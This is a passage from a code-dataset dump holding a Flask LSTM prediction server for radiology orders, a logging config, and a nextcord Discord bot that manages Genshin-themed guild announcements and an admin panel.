getPrediction(examDescription=orderdata_json['examDescription'],OtherSX=orderdata_json['OtherSX'],OtherHX=orderdata_json['OtherHX'],OtherSX2=orderdata_json['OtherSX2'],indicationDescription=orderdata_json['indicationDescription'])\n #prediction = getPrediction(examDescription=orderdata_json['examDescription'],OtherSX=orderdata_json['OtherSX'],OtherSX2=orderdata_json,OtherHX=orderdata_json['OtherHX'],indicationDescription=orderdata_json['indicationDescription'])\n responses = jsonify({\"prediction\":prediction, \"model_version\": model_version})\n responses.status_code = 200\n return(responses)\n\nclass PredictionForm(FlaskForm):\n examDescription = StringField('examDescription', validators=[Required()])\n OtherHX = StringField('OtherHX', validators=[Required()])\n OtherSX = StringField('OtherSX', validators=[Required()])\n OtherSX2 = StringField('OtherSX2', validators=[Required()])\n indicationDescription = StringField('indicationDescription', validators=[Required()])\n #prediction = StringField('prediction', validators=[Required()])\n submit = SubmitField('Submit')\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n name = None\n form = PredictionForm()\n if form.validate_on_submit():\n old_examDescription = session.get('examDescription')\n old_OtherHX = session.get('OtherHX')\n old_OtherSX = session.get('OtherSX')\n old_OtherSX2 = session.get('OtherSX2')\n old_indicationDescription = session.get('indicationDescription')\n if (old_examDescription is not None and old_examDescription 
!= form.examDescription.data) or (old_OtherSX2 is not None and old_OtherSX2 != form.OtherSX2.data) or (old_OtherSX is not None and old_OtherSX != form.OtherSX.data) or (old_indicationDescription is not None and old_indicationDescription != form.indicationDescription.data) or (old_OtherHX is not None and old_OtherHX != form.OtherHX.data):\n            flash('data has changed, predicting')\n\n        session['examDescription'] = form.examDescription.data\n        session['OtherHX'] = form.OtherHX.data\n        session['OtherSX'] = form.OtherSX.data\n        session['OtherSX2'] = form.OtherSX2.data\n        session['indicationDescription'] = form.indicationDescription.data\n        session['prediction'] = getPrediction(examDescription=form.examDescription.data,OtherHX=form.OtherHX.data,OtherSX=form.OtherSX.data,OtherSX2=form.OtherSX2.data,indicationDescription=form.indicationDescription.data)\n        #form.examDescription.data = ''\n        #form.OtherSX.data = ''\n        #form.indicationDescription.data = ''\n        return redirect(url_for('index'))\n        #return render_template('index.html', form=form, examDescription=session.get('examDescription'), OtherSX=session.get('OtherSX'), indicationDescription=session.get('indicationDescription'),prediction=session.get('prediction'))\n    return render_template('index.html', form=form, examDescription=session.get('examDescription'),OtherHX=session.get('OtherHX'),OtherSX=session.get('OtherSX'), OtherSX2=session.get('OtherSX2'), indicationDescription=session.get('indicationDescription'),prediction=session.get('prediction'))\n\nif __name__ == \"__main__\":\n    print(\"* Loading Keras model and Flask starting server...please wait until server has fully started\")\n    files = glob.glob('data/*_data')\n    files.sort(reverse=True)\n    try:\n        if len(files) > 0:\n            print(\"Loading Pickle : \" + files[0] + \"/\" + files[0].replace('data/','') + \"_tokenizer_combined.pickle\")\n            with open(files[0] + '/' + files[0].replace('data/','') + '_tokenizer_combined.pickle', 'rb') as handle:\n                tokenizer = pickle.load(handle)\n                print(tokenizer)\n    except Exception as e:\n        print('Could not open tokenizer')\n        raise e\n    graph = tf.get_default_graph()\n    try:\n        if len(files) > 0:\n            print(\"Loading LSTM Model : \" + files[0] + \"/\" + files[0].replace('data/','') + \"_combined.h5\")\n            lstm_model = load_model(files[0] + '/' + files[0].replace('data/','') + '_combined.h5')\n            model_version = \"ml_postproc_lstm_\" + files[0].replace('data/','')\n    except Exception as e:\n        print('Could not open lstm_model')\n        raise e\n    \"\"\"\n    try:\n        with open('../tokenizer_examDescription_OtherSX_OtherHX_indicationDescription.pickle', 'rb') as handle:\n            tokenizer = pickle.load(handle)\n    except Exception as e:\n        print('Could not open tokenizer')\n        raise e\n    graph = tf.get_default_graph()\n    try:\n        #lstm_model = load_model('../lstm_only_examDescription_OtherSX_indicationDescription.h5')\n        lstm_model = load_model('../lstm_examDescription_OtherSX_OtherHX_indicationDescription.h5')\n    except Exception as e:\n        print('Could not open lstm_model')\n        raise e\n    \"\"\"\n    app.run(host=\"0.0.0.0\",port=8484,threaded=True)\n","repo_name":"kurtteichman/rsna_lstm_retrain","sub_path":"flask_server.py","file_name":"flask_server.py","file_ext":"py","file_size_in_byte":16937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38290179820","text":"\"\"\"\n    sct_logging.py\n    -------\n    Logger setup script\n\"\"\"\n\nlogger_conf_dict = {\n    \"version\": 1,\n    \"formatters\": {\n        \"default\": {\n            \"format\": \"[%(asctime)s] %(module)s ( %(funcName)s ): 
%(levelname)s : %(message)s\",\n        }\n    },\n    \"handlers\": {\n        \"console\": {\n            \"class\": \"logging.StreamHandler\",\n            \"stream\": \"ext://sys.stdout\",\n            \"formatter\": \"default\",\n        }\n    },\n    \"root\": {\"level\": \"INFO\", \"handlers\": [\"console\"]},\n    }\n","repo_name":"sankamuk/SimplyPythonCrudTool","sub_path":"app/utilities/sct_logging.py","file_name":"sct_logging.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"12220106756","text":"# imports\nimport asyncio\nimport datetime as dt\nimport json\nimport os\nimport random\nimport re\nimport secrets\nfrom asyncio import TimeoutError\nfrom datetime import datetime\nimport loguru\nimport nextcord\nimport nextcord as discord\n# from imports\nfrom nextcord.ext import commands as com, tasks\nfrom nextcord.ext.commands.errors import MissingPermissions, BotMissingPermissions\n\nfrom slavebot.ext import models\nfrom utils import GuildDefense\n\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\nLOGGER = loguru.logger\n\nONE_DAY_IN_SECONDS = (60 * 60 * 24)\n\nGUILDS = [\"Dendro\", \"Hydro\", \"Pyro\", \"Cryo\", \"Anemo\", \"Electro\", \"Geo\"]\n\n\nsettings = {\n\t'pre': \"+\",\n\t# the bot token must never be hardcoded in source; read it from the environment instead\n\t'token': os.getenv(\"DISCORD_TOKEN\", \"\"),\n\t\"bot\": \"SlaveBot#5164\",\n\t\"user_id\": \"861626405313708062\",\n\t\"ag_ci\": 929059781245808700,\n\t\"bi_ci\": 929059926641356850\n}\n\n# bot object\nbot = com.Bot(shard_count=2, command_prefix=com.when_mentioned_or(f\"{settings['pre']}\"), intents=discord.Intents.all())\nbot.remove_command(name=\"help\")\nstandard_color = discord.Color.from_rgb(80, 141, 234)\n\nDEBUG = True\n\n\n# on-ready functions\n@bot.event\nasync def on_ready():\n\tdef upd_invites():\n\t\tinvites_json = {\n\t\t\t\"invites_numbers\": 0,\n\t\t\t\"ids_list\": [],\n\t\t}\n\n\t\twith open('additional_files/invites.json', \"w\", encoding=\"UTF-8\") as invites_file_w:\n\t\t\tjson.dump(invites_json, invites_file_w, indent=4)\n\n\t\twith open(\"additional_files/users_cooldown.json\", \"w\", encoding=\"UTF-8\") as cooldown_file_w:\n\t\t\tjson.dump({}, cooldown_file_w, indent=4)\n\n\tupd_invites()\n\n\tserver = bot.get_guild(794987714310045727)\n\n\tchat = server.get_channel(929059781245808700)\n\n\tif DEBUG is False:\n\t\tst = await chat.history(limit=500).flatten()\n\t\tfor msg in st:\n\t\t\ttry:\n\t\t\t\tawait msg.delete()\n\t\t\t\tLOGGER.debug(\n\t\t\t\t\t\"One message was deleted\"\n\t\t\t\t)\n\t\t\texcept Exception as exc:\n\t\t\t\tLOGGER.error(\n\t\t\t\t\tf\"Error in message clearing\\n{exc}\"\n\t\t\t\t)\n\n\t\tawait update_the_database()\n\t\tawait update_the_messages()\n\n\t\tUpdateTask.start()\n\n\tUpdatePresence.start()\n\n\t# every real change bumps the first digit, every new command the second, every bug fix the third\n\tdef version(big, medium, small) -> str:\n\t\treturn \".\".join([str(big), str(medium), str(small)])\n\n\tLOGGER.info(\"I-i-i am in the {} body! 
version {}\".format(bot.user, version(1, 2, 5)))\n\tLOGGER.info(\"Now ping is {}\".format(bot.latency))\n\n\n@bot.event\nasync def on_command_error(ctx, error):\n\tif isinstance(error, com.MaxConcurrencyReached):\n\t\tembed = discord.Embed(title=\"Уупс...\", description=\"потише, мальчик(или вуман), я запрещаю спамить эту команду.\", color=discord.Color.red())\n\t\tawait ctx.reply(embed=embed, view=models.NonBts(), delete_after=3.5)\n\t\tawait ctx.message.add_reaction('❌')\n\telse:\n\t\tLOGGER.warning(\n\t\t\tf\"something went wrong, but we don't saying it to users. \\n\\n\\nError: \\n{error}\\n\"\n\t\t)\n\n\n@tasks.loop(minutes=5)\nasync def UpdatePresence():\n\tc = 0\n\tfor g in bot.guilds:\n\t\tc += len(g.members)\n\n\tLOGGER.info(\n\t\t\"Presence was started\"\n\t)\n\tpresences = [\"подслушивает {count} разговоров...\".format(count=round(int(c) / random.randint(2, 4), 0)), \"Ваши крики о помощи...\", \"Опенинг Клинка Рассекающего демонов!\", \"Советы от недалёких \"\n\t \"людей.\",\n\t \"Мурлыканье Вики\",\n\t \"Стоны Яты\",\n\t \"Хохлятский совет\"]\n\tfor p in presences:\n\t\tawait bot.change_presence(activity=discord.Activity(type=discord.ActivityType.listening, name=str(p)))\n\t\tawait asyncio.sleep(60)\n\n\tUpdatePresence.restart()\n\n\nasync def update_the_database():\n\tasync def get_Gmaster(guild):\n\n\t\tguild_master_role_id = models.get_tag_value(\"TIME_ROLE\", f\"guild-master_{guild}\")\n\n\t\tguild_master_role = server.get_role(guild_master_role_id)\n\t\ttry:\n\t\t\tguild_master_user = guild_master_role.members[0]\n\t\texcept Exception as e:\n\t\t\tLOGGER.error(f\"ОШИБКА В get_Gmaster в НЕ НАЙДЕН ГМ {guild}, ПОДСТАВЛЕН АВАКУСУ\"\n\t\t\t f\"! \\n\" + str(e))\n\n\t\t\tguild_master_user = await server.fetch_member(361198710551740428)\n\t\treturn {\"role\": guild_master_role, \"user\": guild_master_user}\n\n\tdef get_channel(guild):\n\t\treturn server.get_channel(models.get_tag_value(\"CHANNEL\", f\"channel_{guild}\"))\n\n\tasync def get_users_count(guild):\n\t\tserver = await bot.fetch_guild(794987714310045727)\n\t\tguild_role = models.NEDOGUILD().get_one_tag(guild=guild, tag=\"role\")\n\t\tguild_role = server.get_role(guild_role)\n\t\tcount = len(guild_role.members)\n\n\t\treturn count\n\n\tserver = bot.get_guild(794987714310045727)\n\tguilds = [\"Dendro\", \"Hydro\", \"Pyro\", \"Cryo\", \"Anemo\", \"Electro\", \"Geo\"]\n\n\tfor guild in guilds:\n\t\tLOGGER.info(f\"[INFO] UPDATING {guild.upper()} GUILD\")\n\t\tgm_and_role = await get_Gmaster(guild)\n\t\tmodels.NEDOGUILD().update_one_tag(guild=guild, tag=\"users\", new_value=await get_users_count(guild))\n\t\tmodels.NEDOGUILD().update_one_tag(guild=guild, tag=\"guild_president\", new_value=gm_and_role[\"user\"].id)\n\t\tmodels.NEDOGUILD().update_one_tag(guild=guild, tag=\"guild_chat_description\", new_value=get_channel(guild).topic)\n\t\tmodels.NEDOGUILD().update_one_tag(guild=guild, tag=\"guild_master_role\", new_value=gm_and_role[\"role\"].id)\n\t\tmodels.change_tag_in_type(\"GUILD\", f\"guild_{guild}\", fill=gm_and_role[\"user\"].id)\n\t\tLOGGER.info(f\"[INFO] UPDATED {guild.upper()} GUILD\")\n\n\tLOGGER.success(\"UPDATED THE DATABASE\")\n\n\nasync def update_the_messages():\n\tglobal vars\n\n\tasync def get_color(guild, server):\n\t\tif guild == \"Dendro\":\n\t\t\treturn [discord.Color.from_rgb(60, 173, 79), await server.fetch_emoji(868084062668095549)]\n\n\t\telif guild == \"Anemo\":\n\t\t\treturn [discord.Color.from_rgb(102, 205, 170), await server.fetch_emoji(868084061510463538)]\n\n\t\telif guild == 
\"Hydro\":\n\t\t\treturn [discord.Color.from_rgb(154, 176, 229), await server.fetch_emoji(868084062693236827)]\n\n\t\telif guild == \"Pyro\":\n\t\t\treturn [discord.Color.from_rgb(204, 47, 47), await server.fetch_emoji(868083783457443860)]\n\n\t\telif guild == \"Cryo\":\n\t\t\treturn [discord.Color.from_rgb(0, 252, 255), await server.fetch_emoji(868084061929877594)]\n\n\t\telif guild == \"Electro\":\n\t\t\treturn [discord.Color.from_rgb(103, 88, 182), await server.fetch_emoji(868084063142035466)]\n\n\t\telif guild == \"Geo\":\n\t\t\treturn [discord.Color.from_rgb(255, 222, 60), await server.fetch_emoji(868084063003639889)]\n\n\t# 204, 47, 47 - страндарт цвет\n\n\tdef get_users_count(guild):\n\t\tguild_role = models.NEDOGUILD().get_one_tag(guild=guild, tag=\"role\")\n\t\tguild_role = server.get_role(guild_role)\n\n\t\tcount = len(guild_role.members)\n\n\t\treturn count\n\n\tserver = bot.get_guild(794987714310045727)\n\n\tdef sort_dict(dict):\n\t\tsorted_dict = {i[0]: i[1] for i in sorted(dict.items(), key=lambda para: (para[1]))}\n\n\t\treturn sorted_dict\n\n\tguilds_list = [\"Dendro\", \"Hydro\", \"Pyro\", \"Cryo\", \"Anemo\", \"Electro\", \"Geo\"]\n\n\tguilds_dict_by_users = {g: get_users_count(g) for g in guilds_list}\n\n\tguilds_dict_by_users_sorted = sort_dict(guilds_dict_by_users)\n\n\tchat = server.get_channel(929059781245808700)\n\n\t# def clean_text(text: str, list: list) -> str:\n\t# \tres = text\n\t# \tfor i in list:\n\n\tfor guild in guilds_dict_by_users_sorted:\n\t\tcolor_and_emoji = await get_color(guild, server)\n\t\ttext = models.NEDOGUILD().get_one_tag(guild=guild, tag=\"campaign_speech\")\n\n\t\tguild_master = models.NEDOGUILD().get_one_tag(guild=guild, tag=\"guild_president\")\n\n\t\tguild_master = await server.fetch_member(guild_master)\n\n\t\tusers_count = get_users_count(guild)\n\t\t# speech = re.sub(\"\\s*\\}\", \"}\", text)\n\t\t# speech = re.sub(\"{\\s*\", \"{\", speech)\n\t\t#\n\t\t# formatted_speech = speech\n\t\t#\n\t\t# vars: Dict = {\"guild_name\": guild,\n\t\t# \"users_count\": users_count,\n\t\t# \"awakusu\": \"<@!361198710551740428>\",\n\t\t# \"master\": f\"{guild_master.mention}\"}\n\t\t#\n\t\t# try:\n\t\t# \tformatted_speech = speech.format(**vars)\n\t\t# except (\n\t\t# \t\tKeyError\n\t\t# ):\n\t\t# \tLOGGER.warning(\"В речи несуществующая переменная, удали пж\")\n\t\t# except Exception:\n\t\t# \tLOGGER.error(\"Ошибка редактирования речи!\")\n\n\t\tembed = discord.Embed(title=f\"{color_and_emoji[1]}{guild} **гильдия**!{color_and_emoji[1]}\",\n\t\t description=f\"**{color_and_emoji[1]} Кол-во участников**: {users_count}{color_and_emoji[1]}\\n\"\n\t\t f\"**{color_and_emoji[1]} Глава гильдии**: {guild_master.mention}{color_and_emoji[1]}\\n\"\n\t\t f\"\\n\\n\\n\\n\"\n\t\t f\"**{color_and_emoji[1]} Агитационная речь главы гильдии**:\\n\\n\"\n\t\t f\"{text}\", color=color_and_emoji[0])\n\n\t\tembed = models.embed_stan(embed)\n\n\t\tmessage = await chat.send(embed=embed)\n\t\tawait message.add_reaction(color_and_emoji[1])\n\n\tserver = bot.get_guild(794987714310045727)\n\tchat = await server.fetch_channel(settings[\"ag_ci\"])\n\tbts = models.GuildView(bot=bot)\n\n\tembed_start = discord.Embed(\n\t\ttitle=\"Итак вы прочли агитации...\",\n\t\tdescription=\"```diff\\n-��сли вы не прочли агитации - настоятельно рекомендую это сделать```\\n\\n\\n\\nИтак вы прочли агитации: \\n\\n**__1)__ выберите гильдию из 7 доступных**\\n**__2)__ нажмите на \"\n\t\t \"одну из кнопок ниже(на ту, на которой имя понравившейся вам гильдии)** \\n**__3)__ заполните заявку, это не возьмёт 
много времени.** \\n\\n\\n```diff\\n-ПРИМЕЧАНИЕ! рекомендую при \"\n\t\t \"составлении заявки писать реальные вещи и ничего не выдумывать, а ещё лучше подготовится: (Возраст, причина вступить в гильдию, Любимые персонажи Геншина).```\",\n\t\tcolor=standard_color)\n\n\tawait chat.send(embed=embed_start, view=bts)\n\n\n@tasks.loop(seconds=0.00001)\nasync def UpdateTask():\n\tisrael_tz = dt.timezone(offset=dt.timedelta(hours=2), name=\"UTC\")\n\tdt_now = dt.datetime.now(tz=israel_tz)\n\n\ttime_m = datetime(year=dt_now.year, month=dt_now.month, day=dt_now.day, hour=5, minute=00, second=00, microsecond=000000)\n\ttime_e = datetime(year=dt_now.year, month=dt_now.month, day=dt_now.day, hour=17, minute=00, second=00, microsecond=000000)\n\n\tnow = datetime(year=dt_now.year, month=dt_now.month, day=dt_now.day, hour=dt_now.hour, minute=dt_now.minute, second=dt_now.second, microsecond=00)\n\n\tif time_m == now:\n\n\t\tserver = bot.get_guild(794987714310045727)\n\n\t\tchat = server.get_channel(929059781245808700)\n\n\t\tst = await chat.history(limit=500).flatten()\n\t\tfor msg in st:\n\t\t\ttry:\n\t\t\t\tawait msg.delete()\n\t\t\t\tLOGGER.debug(\n\t\t\t\t\t\"One message was deleted\"\n\t\t\t\t)\n\n\t\t\texcept Exception as exc:\n\t\t\t\tLOGGER.error(exc)\n\t\tawait chat.purge(limit=100)\n\n\t\tawait update_the_database()\n\t\tawait update_the_messages()\n\n\telif time_e == now:\n\n\t\tserver = bot.get_guild(794987714310045727)\n\n\t\tchat = server.get_channel(929059781245808700)\n\n\t\tst = await chat.history(limit=500).flatten()\n\t\tfor msg in st:\n\t\t\ttry:\n\t\t\t\tawait msg.delete()\n\t\t\t\tLOGGER.debug(\n\t\t\t\t\t\"One message was deleted\"\n\t\t\t\t)\n\n\t\t\texcept Exception as exc:\n\t\t\t\tLOGGER.error(\n\t\t\t\t\tf\"Error in message clearing\\n{exc}\"\n\t\t\t\t)\n\n\t\tawait update_the_database()\n\t\tawait update_the_messages()\n\n\telse:\n\t\tpass\n\n\n@bot.command(name='пинг', aliases=[\"латентность\", \"ping\"])\n@com.cooldown(1, 5, com.BucketType.user)\nasync def ping(ctx):\n\ttry:\n\t\tdef dur(ping: float):\n\t\t\tif ping <= 5:\n\t\t\t\treturn f\"Пинг: {str(ping).split('.')[0]}ms: автоматическая оценка: Идеально.\"\n\n\t\t\telif ping >= 5 and ping < 10:\n\t\t\t\treturn f\"Пинг: {str(ping).split('.')[0]}ms: автоматическая оценка: Хорошо.\"\n\n\t\t\telif ping >= 10 and ping < 20:\n\t\t\t\treturn f\"Пинг: {str(ping).split('.')[0]}ms: автоматическая оценка: Нормально.\"\n\n\t\t\telif ping >= 20 and ping < 30:\n\t\t\t\treturn f\"Пинг: {str(ping).split('.')[0]}ms: автоматическая оценка: Средне.\"\n\n\t\t\telif ping >= 30:\n\t\t\t\treturn f\"Пинг: {str(ping).split('.')[0]}ms: автоматическая оценка: Плохо.\"\n\n\t\tembed = discord.Embed(title=\"Текущая латентность!\", description=f\"**{dur(round(bot.latency, 2) * 100)}**\", color=standard_color)\n\t\tembed = models.embed_stan(embed)\n\t\tawait ctx.send(embed=embed)\n\texcept Exception as e:\n\t\tLOGGER.error(f\"Exception in latency command, {e}\")\n\n\n# Мэйн страница админки и уровни доступа к ней.\n\n# Main\nasync def main(ctx, msg=None):\n\tif await access_lvl(ctx) >= 1:\n\t\tapf = models.AdminPanelFunc(await ctx.guild.fetch_member(ctx.author.id))\n\t\tembed_admin_panel = discord.Embed(title='Админ-Панель;',\n\t\t description=\"Выберите функцию которую небходимо возпроизвести, у все функций разный уровень доступа.\",\n\t\t color=discord.Colour.from_rgb(80, 141, 234))\n\n\t\tembed_admin_panel.set_author(name=\"NEDOGUILD's-System\",\n\t\t 
icon_url=\"https://cdn.discordapp.com/attachments/845771501571539035/930127142367420447/250.png\")\n\n\t\tdt_string = str(datetime.now())\n\n\t\tembed_admin_panel.set_footer(text=f\"{dt_string[:-10]}\")\n\n\t\tif msg is None:\n\t\t\tmsg_ap = await ctx.send(embed_admin_panel, view=apf)\n\t\telse:\n\t\t\tmsg_ap = await msg.edit(embed=embed_admin_panel, view=apf)\n\n\t\tawait apf.wait()\n\n\t\tif apf.Func is None:\n\t\t\tawait msg_ap.delete()\n\n\t\telif apf.Func == \"FUNC:JSON\":\n\t\t\tif int(await access_lvl(ctx)) >= 2:\n\t\t\t\tawait json_pan(ctx, msg_ap)\n\t\t\telse:\n\t\t\t\tawait msg_ap.edit(embed=discord.Embed(title=f'Недостаточный уровень доступа, для этой функции нужен 2 уровень доступа, ваш равен {await access_lvl(ctx)}.'))\n\t\t\t\tawait asyncio.sleep(2.5)\n\t\t\t\tawait main(ctx, msg_ap)\n\telse:\n\t\tLOGGER.info(\"User haven't access to this command\")\n\n\n# Access\n\nasync def access_lvl(ctx=None, user_=None):\n\t# Три уровня доступа.\n\t# Первый - 0 - обычный юзер, без доступа в админку.\n\t# Второй - 1 - Гильд-Мастер, с доступом к некоторым функциям по управлению гильдией.\n\t# Третий - 2 - Ята, Авакусу и все смотрящие за гильдиями а также администрация, доступ ко всем функциям.\n\n\tuser = await ctx.guild.fetch_member(ctx.author.id) if user_ is None else user_\n\n\tif user.bot:\n\t\treturn 0\n\telse:\n\t\taccess_lvl_2 = []\n\t\taccess_lvl_1 = []\n\t\t# Получаем все роли первого и второго уровня из JSON'a\n\n\t\twith open(\"additional_files/config_file.json\", \"r\") as file:\n\t\t\tfile = json.load(file)\n\n\t\tfor role in file['TIME_ROLE']:\n\t\t\tif role.startswith('guild-vision'):\n\t\t\t\taccess_lvl_2.append(file['TIME_ROLE'][role])\n\t\t\telse:\n\t\t\t\tif role.startswith('guild-master'):\n\t\t\t\t\taccess_lvl_1.append(file['TIME_ROLE'][role])\n\t\t\t\telse:\n\t\t\t\t\tpass\n\n\t\t# ----------------------------------------------------------------\n\n\t\t# Проверяем есть ли роли первого и второго уровня у юзера.\n\t\ttry:\n\t\t\tif user.guild_permissions.administrator:\n\t\t\t\treturn 2\n\n\t\t\tif user.id == 686207718822117463:\n\t\t\t\treturn 2\n\n\t\texcept Exception:\n\t\t\treturn 0\n\n\n\t\telse:\n\t\t\tlvl_1 = 0\n\t\t\tlvl_2 = 0\n\n\t\t\tfor role in access_lvl_1:\n\t\t\t\tfor role_ in user.roles:\n\t\t\t\t\tif role == role_.id:\n\t\t\t\t\t\tlvl_1 += 1\n\t\t\t\t\telse:\n\t\t\t\t\t\tpass\n\n\t\t\tfor role in access_lvl_2:\n\t\t\t\tfor role_ in user.roles:\n\t\t\t\t\tif role == role_.id:\n\t\t\t\t\t\tlvl_2 += 1\n\t\t\t\t\telse:\n\t\t\t\t\t\tpass\n\n\t\t\tif lvl_1 == 0 and lvl_2 == 0:\n\t\t\t\treturn 0\n\n\t\t\tif lvl_1 > lvl_2:\n\t\t\t\treturn 1\n\t\t\telse:\n\t\t\t\tif lvl_2 > lvl_1:\n\t\t\t\t\treturn 2\n\t\t\t\telse:\n\t\t\t\t\tif lvl_1 == lvl_2:\n\t\t\t\t\t\treturn 2\n\n\n# -----------------------------------------------------------------------------\n\n# JSON раздел админки\n\nasync def last_page(str_name_last_page: str, ctx, msg):\n\tif str_name_last_page == \"ROLE\":\n\t\tawait json_type_pan(ctx, msg, \"ROLE\")\n\telif str_name_last_page == \"CHANNEL\":\n\t\tawait json_type_pan(ctx, msg, \"CHANNEL\")\n\telif str_name_last_page == \"TIME_ROLE\":\n\t\tawait json_type_pan(ctx, msg, \"TIME_ROLE\")\n\telif str_name_last_page == \"GUILD\":\n\t\tawait json_type_pan(ctx, msg, \"GUILD\")\n\telse:\n\t\tawait main(ctx, msg)\n\n\nasync def json_pan(ctx, msg):\n\tbtc = models.Type(await ctx.guild.fetch_member(ctx.author.id))\n\tembed_type_chose = discord.Embed(title=\"Админ-Панель: JSON;\",\n\t description=\"Какой раздел в базе-данных надо отредактировать?\",\n\t 
color=discord.Colour.from_rgb(80, 141, 234))\n\n\tembed_type_chose.set_author(name=\"NEDOGUILD's-System\",\n\t icon_url=\"https://cdn.discordapp.com/attachments/845771501571539035/930127142367420447/250.png\")\n\n\tdt_string = str(datetime.now())\n\n\tembed_type_chose.set_footer(text=f\"{dt_string[:-10]}\")\n\n\tawait msg.edit(embed=embed_type_chose, view=btc)\n\n\tawait btc.wait()\n\n\tres = btc.Type\n\n\tif res == \"BACK\":\n\t\tawait main(ctx=ctx, msg=msg)\n\n\telif res == \"ROLE\":\n\t\tawait json_type_pan(ctx, msg, \"ROLE\")\n\telif res == \"CHANNEL\":\n\t\tawait json_type_pan(ctx, msg, \"CHANNEL\")\n\telif res == \"TIME_ROLE\":\n\t\tawait json_type_pan(ctx, msg, \"TIME_ROLE\")\n\telif res == \"GUILD\":\n\t\tawait json_type_pan(ctx, msg, \"GUILD\")\n\telse:\n\t\tif res == \"STOP\" or res is None:\n\t\t\tawait msg.delete()\n\n\nasync def edit_json_type(ctx, msg, type):\n\tdef check(msg):\n\t\treturn msg.author == ctx.author and msg.channel == ctx.channel\n\n\tembed_please_give_me_a_tag = discord.Embed(title=f\"Админ-Панель: JSON: {type}: Edit: Tag;\",\n\t description=\"Введите Tag который надо изменить. Вводите тег с соблюдением всех символов и правильным размером символов.\", )\n\n\tembed_please_give_me_a_tag = models.embed_stan(embed=embed_please_give_me_a_tag)\n\n\tembed_please_give_me_a_fill = discord.Embed(title=f\"Админ-Панель: JSON: {type}: Edit: Fill;\", description=\"Введите новое значение.\")\n\n\tembed_please_give_me_a_fill = models.embed_stan(embed_please_give_me_a_fill)\n\n\t#\n\t#\n\t#\n\n\tembed_time_err = models.embed_stan(embed=discord.Embed(title=f\"Админ-Панель: JSON: {type}: Edit: Error;\", description=\"Вы не дали ответ, возвращаю вас на прежнюю страницу.\"))\n\n\tembed_none_err = models.embed_stan(embed=discord.Embed(title=f\"Админ-Панель: JSON: {type}: Edit: Error;\",\n\t description=\"Такого значения нет в базе данных, возвращаю вас на прежнюю страницу.\"))\n\n\tawait msg.edit(embed=embed_please_give_me_a_tag, view=models.NonBts())\n\ttry:\n\t\ttag = await bot.wait_for(\"message\", check=check, timeout=20)\n\texcept TimeoutError:\n\t\tawait msg.edit(embed=embed_time_err, view=models.NonBts())\n\t\tawait asyncio.sleep(2.5)\n\t\tawait last_page(type, ctx, msg)\n\telse:\n\t\tche = models.check_tag_in_type(type=type, tag=tag.content)\n\t\tawait tag.delete()\n\t\tif che is None:\n\t\t\tawait msg.edit(embed=embed_none_err, view=models.NonBts())\n\t\t\tawait asyncio.sleep(2.5)\n\t\t\tawait last_page(type, ctx, msg)\n\t\telse:\n\t\t\tif che is True:\n\t\t\t\ttry:\n\t\t\t\t\tawait msg.edit(embed=embed_please_give_me_a_fill, view=models.NonBts())\n\t\t\t\t\tfill = await bot.wait_for(\"message\", check=check, timeout=20)\n\t\t\t\texcept TimeoutError:\n\t\t\t\t\tawait msg.edit(embed=embed_time_err, view=models.NonBts())\n\t\t\t\t\tawait asyncio.sleep(2.5)\n\t\t\t\t\tawait last_page(type, ctx, msg)\n\t\t\t\telse:\n\t\t\t\t\tawait fill.delete()\n\t\t\t\t\tmodels.change_tag_in_type(type, tag.content, fill.content)\n\t\t\t\t\tawait msg.edit(embed=models.embed_stan(embed=discord.Embed(title=f'Админ-Панель: JSON: {type}: Edit: Success;', color=discord.Colour.from_rgb(80, 141, 234))), view=models.NonBts())\n\t\t\t\t\tawait asyncio.sleep(1.5)\n\t\t\t\t\tawait last_page(type, ctx, msg)\n\n\nasync def add_json_to_type(ctx, msg, type):\n\tdef check(msg):\n\t\treturn msg.author == ctx.author and msg.channel == ctx.channel\n\n\tembed_add_tag_give_me = discord.Embed(\n\t\ttitle=f\"Админ-Панель: JSON: {type}: Add: Tag;\",\n\t\tdescription=f\"Напишите в чат название тега который надо 
добавить, он должен начинатся с {type.lower()}.\"\n\t\t f\"\\n\\nНапример: {type.lower()}_DendroRole\", color=discord.Colour.from_rgb(80, 141, 234))\n\n\tembed_add_fill_give_me = discord.Embed(\n\t\ttitle=f\"Админ-Панель: JSON: {type}: Add: fill;\",\n\t\tdescription=f\"Напишите в чат значение для этого тега, оно не должно содержать буквы или другие символы. **Только цифры**\\n\\nНапример: 123\", color=discord.Colour.from_rgb(80, 141, 234))\n\n\tembed_add_fill_give_me = models.embed_stan(embed_add_fill_give_me)\n\n\tembed_time_err = models.embed_stan(embed=discord.Embed(title=f\"Админ-Панель: JSON: {type}: Add: Error;\",\n\t description=\"Вы не дали ответ, возвращаю вас на прежнюю страницу.\"))\n\n\tembed_true_err = models.embed_stan(embed=discord.Embed(title=f\"Админ-Панель: JSON: {type}: Add: Error;\",\n\t description=\"Такой тег уже записан в базу данных, невозможно иметь два одинаковых тега.\", color=discord.Colour.from_rgb(80, 141, 234)))\n\n\tembed_add_tag_give_me = models.embed_stan(embed_add_tag_give_me)\n\n\tadd_tag = models.change_tag_in_type\n\n\tawait msg.edit(embed=embed_add_tag_give_me, view=models.NonBts())\n\ttry:\n\t\ttagN = await bot.wait_for(\"message\", check=check, timeout=30)\n\texcept TimeoutError:\n\t\tawait msg.edit(embed=embed_time_err)\n\t\tawait asyncio.sleep(2.5)\n\t\tawait last_page(type, ctx, msg)\n\telse:\n\t\tche = models.check_tag_in_type(type, tagN.content)\n\t\tif che is True:\n\t\t\tawait msg.edit(embed=embed_true_err, view=models.NonBts())\n\t\t\tawait asyncio.sleep(2.5)\n\t\t\tawait last_page(type, ctx, msg)\n\t\telse:\n\t\t\tif che is None:\n\t\t\t\tawait msg.edit(embed=embed_add_fill_give_me, view=models.NonBts())\n\t\t\t\tawait tagN.delete()\n\t\t\t\ttry:\n\t\t\t\t\tfillN = await bot.wait_for(\"message\", check=check, timeout=30)\n\t\t\t\texcept TimeoutError:\n\t\t\t\t\tawait msg.edit(embed=embed_time_err)\n\t\t\t\t\tawait asyncio.sleep(2.5)\n\t\t\t\t\tawait last_page(type, ctx, msg)\n\t\t\t\telse:\n\t\t\t\t\tawait fillN.delete()\n\t\t\t\t\tadd_tag(type, tagN.content, fillN.content)\n\t\t\t\t\tawait 